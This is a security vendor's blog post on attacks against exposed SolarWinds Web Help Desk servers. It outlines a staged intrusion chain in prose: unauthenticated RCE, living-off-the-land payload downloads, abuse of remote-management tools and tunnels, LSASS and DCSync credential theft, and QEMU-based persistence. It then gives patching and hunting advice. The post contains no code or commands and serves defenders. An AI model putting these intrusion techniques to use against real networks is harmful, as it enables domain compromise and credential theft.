SolarWinds Web Help Desk RCE Exploitation Shows How One Exposed App Becomes Domain Compromise

Active exploitation of SolarWinds Web Help Desk (WHD) is a clean example of a pattern defenders keep relearning the hard way: one internet-exposed application with a critical flaw can turn into full identity takeover and enterprise-wide impact. Microsoft reported multi-stage intrusions starting from exposed WHD servers, followed by lateral movement toward high-value assets, using low-noise techniques and legitimate admin tooling.

This matters because help desk platforms sit in the blast radius of everything that matters: credentials, tickets with sensitive context, asset visibility, admin workflows, and often a direct line into Active Directory environments. When that foothold is remote code execution without authentication, the only realistic outcome is a race between patching and compromise.

What is being exploited

Multiple vulnerabilities are in scope, and responders have not been able to reliably attribute every intrusion to one specific CVE because some targets were vulnerable to several at the same time. Microsoft explicitly noted it could not confirm which CVE was used in observed December 2025 activity, given overlapping exposure across older and newly disclosed issues.

The key issues referenced across reporting include:

CVE-2025-40551 — deserialization of untrusted data leading to unauthenticated remote code execution.

CVE-2025-40536 — security control bypass that can allow unauthenticated access to restricted functionality.

CVE-2025-26399 — an unauthenticated AjaxProxy deserialization RCE, described as a patch-bypass chain from earlier WHD issues.

CISA added CVE-2025-40551 to the Known Exploited Vulnerabilities catalog and set an accelerated remediation deadline for U.S. federal agencies, reinforcing that exploitation is not theoretical.

How the intrusions unfold

Across Microsoft, Huntress, and additional responder reporting, the operational flow is consistent: initial foothold via exposed WHD, then rapid pivot to persistence, credential access, and identity-centric lateral movement.

Stage 1: Initial access from an internet-exposed WHD server

Successful exploitation of exposed WHD instances has enabled unauthenticated RCE in the WHD application context.

Stage 2: Payload execution and “living off the land”

Microsoft observed post-exploitation activity that spawns PowerShell and uses Windows-native capabilities such as BITS to download and execute payloads.

Stage 3: Persistence using legitimate remote tooling and tunnels

A recurring theme is the abuse of legitimate remote monitoring and management software for persistent, hands-on access.

Microsoft described attackers downloading and using legitimate Zoho ManageEngine components for persistent control.

Huntress documented post-exploitation deployment of Zoho tooling, followed by rapid pivot to additional tooling for control and redundancy, including Cloudflare tunnels and Velociraptor for command-and-control style execution.

Elastic’s write-up aligns with the same themes: RMM abuse, tunneling, and RDP-based persistence after exploitation.

Stage 4: Credential access and identity takeover

This is where WHD exploitation becomes a domain compromise story.

Microsoft observed credential theft techniques including DLL side-loading to access LSASS memory and credential material.

At least one case included DCSync activity, a strong indicator of high privilege and direct Active Directory replication abuse.

Elastic also highlights identity-focused outcomes, including DCSync and efforts consistent with extracting NTDS.dit from a domain controller.

Stage 5: Stealthy long-haul persistence using scheduled tasks and virtualization

One of the more aggressive persistence patterns described is a scheduled task launching QEMU to create an SSH backdoor and isolate attacker activity inside a virtualized environment.

Microsoft described scheduled task creation to launch QEMU under SYSTEM at startup.

Huntress tied this to a recurring scheduled task name and documented QEMU-backed SSH persistence in active cases.

Elastic provided matching details and emphasized detection opportunities around scheduled task creation and QEMU-based tunneling behavior.

What this means for security leaders

This incident is not “a SolarWinds story.” It is an internet-facing application governance failure that becomes an identity compromise story.

Source

Three takeaways matter:

Exposure beats sophistication. If WHD is reachable from the internet, attackers do not need phishing, insider access, or complex initial tradecraft. They need one exploit path.

Legitimate tools are the new malware. Zoho RMM, Cloudflare tunnels, and DFIR tooling can look normal in environments without strict controls and monitoring for dual-use abuse.

Identity is the pivot point. Once attackers get credentials and replication capability, containment cost and blast radius expand sharply, regardless of how the initial foothold occurred.

Immediate response priorities

1) Patch and remove unnecessary exposure

WHD fixes for the highlighted CVEs are available in WHD version 2026.1, and KEV-driven timelines show how fast exploitation follows disclosure.

Operationally, patching alone is not enough for internet-facing systems:

Remove WHD from direct internet exposure wherever possible

Restrict admin paths and enforce network-level controls

Increase logging specifically around WHD application activity and child process execution patterns

2) Hunt for post-exploitation tooling and abnormal remote access

Focus on evidence of new or unauthorized remote tooling and tunneling. Reported activity includes abuse of:

Zoho ManageEngine and related components used for persistent remote control

Cloudflared-based tunnel installation and use

Velociraptor installation and service execution patterns

Scheduled task creation tied to QEMU-backed SSH persistence

3) Rotate credentials and assume identity exposure

Microsoft and Elastic both emphasize credential rotation, starting with service and administrative accounts reachable from the WHD host, and isolating suspected compromised machines.

Treat these as non-negotiable:

Rotate WHD service credentials and any privileged accounts with interactive access to the host

Review AD for replication abuse indicators consistent with DCSync

Validate domain admin group membership integrity and recent changes

InfoSight perspective: this is exactly what exposure management is supposed to prevent

Incidents like this keep happening because most programs still run vulnerability work as a backlog, not as an exposure reduction system.

A functional exposure-management posture does four things consistently:

Find internet-facing services continuously and treat them as emergency-patching scope when critical issues land in the wild.

Prioritize by exploitability and exposure, not by raw CVSS. KEV and confirmed exploitation should override normal patch cycles.

Measure MTTR and patch SLA performance for public-facing systems as a board-level control metric, not an IT hygiene stat.

Prove reduction with defensible evidence across vulnerability state, identity risk indicators, and remediation execution.

This is where InfoSight’s approach matters: operationalize vulnerability and identity risk into measurable signals, track remediation speed, and produce reporting that shows exposure is trending down before an attacker proves it for you.